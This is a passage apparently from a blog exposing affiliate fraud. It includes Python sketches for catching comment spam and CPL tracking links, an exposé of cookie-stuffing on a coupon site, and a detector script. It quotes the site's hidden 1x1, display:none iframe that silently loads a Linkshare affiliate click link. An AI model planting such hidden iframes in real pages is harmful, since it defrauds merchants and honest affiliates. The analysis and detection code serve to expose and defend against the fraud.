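def mark_as_spam(text):
    flagged_hashes.add(comment_fingerprint(text))

def allow_comment(text):
    """Block at the front door: reject reposts of known-bad comments."""
    return comment_fingerprint(text) not in flagged_hashes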

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.
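A first cut at identifying outbound CPL links is to extract every URL in a comment, expand any shorteners, and check every hop of the redirect chain against a list of known affiliate/CPL tracking domains. In the sketch below the domain list is seeded only with the trackers seen in this post, so treat it as an illustration rather than a working filter.

import re
import requests

# Seeded with trackers seen in this post; a real list would be far larger.
CPL_TRACKING_DOMAINS = ("trk.surveyjunkie.com", "www.maxbounty.com", "track.popmog.com")
URL_RE = re.compile(r"(?:https?://|goo\.gl/|bit\.ly/)\S+")

def expand_chain(url):
    """Follow redirects and return every URL visited, including the final one."""
    if not url.startswith("http"):
        url = "http://" + url
    try:
        response = requests.head(url, allow_redirects=True, timeout=10)
    except requests.RequestException:
        return [url]
    return [hop.url for hop in response.history] + [response.url]

def has_cpl_link(comment):
    """True if any link in the comment passes through a known CPL tracker."""
    for raw_url in URL_RE.findall(comment):
        for visited in expand_chain(raw_url):
            if any(domain in visited for domain in CPL_TRACKING_DOMAINS):
                return True
    return False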

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason is that Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When you visit this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279; note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This is HTML that will invisibly load the affiliate click link and, in turn, the merchant that it routes through to (resulting in the applicable cookies being pushed onto the user’s machine); in this case it is att.com. I dynamically modified the page to show the att.com page that was hidden; follow the red arrow below.

wirelesscouponcode_affiliate_fraud_1

 

As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant loses and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.
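If you want to hunt for this pattern on other pages, a quick heuristic is to fetch the page and look for iframes that are both effectively invisible (1×1 or display:none) and pointed at a known affiliate click domain. Here is a rough sketch using Python and BeautifulSoup, seeded only with the click domain seen in this post; the URL in the usage line is a placeholder, not the specific page discussed above.

import requests
from bs4 import BeautifulSoup

# Affiliate click domains to look for; extend as needed.
AFFILIATE_CLICK_DOMAINS = ("click.linksynergy.com",)

def find_stuffed_iframes(url):
    """Return the src of iframes that look hidden and point at affiliate click links."""
    html = requests.get(url, timeout=15).text
    soup = BeautifulSoup(html, "html.parser")

    suspects = []
    for iframe in soup.find_all("iframe"):
        src = iframe.get("src", "")
        style = iframe.get("style", "").replace(" ", "").lower()
        tiny = iframe.get("width") in ("0", "1") or iframe.get("height") in ("0", "1")
        hidden = "display:none" in style or "visibility:hidden" in style
        if (tiny or hidden) and any(d in src for d in AFFILIATE_CLICK_DOMAINS):
            suspects.append(src)
    return suspects

# Placeholder URL for illustration; point this at the page in question.
print(find_stuffed_iframes("http://wirelesscouponcode.com/"))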

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing